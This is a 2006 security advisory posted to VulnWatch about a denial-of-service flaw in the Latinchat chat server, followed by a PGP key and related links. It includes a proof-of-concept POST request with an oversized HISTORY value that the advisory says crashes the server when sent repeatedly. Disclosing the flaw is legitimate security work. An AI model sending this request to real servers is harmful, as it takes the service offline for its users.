[VulnWatch] Latinchat Denial Of Service



Denial Of Service on Chat Magma Latinchat
http://www.latinchat.com

Researcher: Vicente Perez

1.-Overview

Latinchat is one of the most known chat server, and used basically by
latin american people.

2.-Description

This system has a vulnerabily as DoS, taking system offline by a while.

The fail happens when the histroy variable is not properly checked by
system, and when the request, is modified by a mal intencionated user,
can take the system down. History variable is used to show the last X
messages sent to the room before the conexion takes place.

A POC has been writed as:

POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp006-org.latinchat.com
Content-length: 142

UserName=Pentest&SessionID=C247b19b2a&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999

When this URL is sent for a spefied times, the server crash.

4.- Disclosure Timeout
Vendor COntacted: 08-Julio-2006 Vendor never response.
Public Advisory: 08-Agosto-2006

5.- Copyright

http://www.securitynation.com - Security Nation is a Lab Supported by
RISS Security Services.
http://www.riss.com.mx
vicente.perez@xxxxxxxxxxx
Copyright SecurityNation.
Contact: vp.vicenteperez@xxxxxxxxx
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.5 (MingW32) - WinPT 0.9.92

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
v5epLj9RxxnqdWDtT2vy2uHx0j9X
=V9Ch
-----END PGP PUBLIC KEY BLOCK-----

Attachment: signature.asc
Description: OpenPGP digital signature



Relevant Pages

  • [Full-disclosure] Latinchat Denial Of Service
    ... Denial Of Service on Chat Magma Latinchat ... Latinchat is one of the most known chat server, ... RISS Security Services. ... Copyright SecurityNation. ...
    (Full-Disclosure)
  • [Full-disclosure] Latinchat Denial Of Service
    ... Denial Of Service on Chat Magma Latinchat ... Latinchat is one of the most known chat server, ... RISS Security Services. ... Copyright SecurityNation. ...
    (Full-Disclosure)
  • Latinchat Denial Of Service
    ... Denial Of Service on Chat Magma Latinchat ... Latinchat is one of the most known chat server, ... RISS Security Services. ... Copyright SecurityNation. ...
    (Bugtraq)
  • [VulnWatch] Latinchat Denial Of Service
    ... Denial Of Service on Chat Magma Latinchat ... Latinchat is one of the most known chat server, ... RISS Security Services. ... Copyright SecurityNation. ...
    (VulnWatch)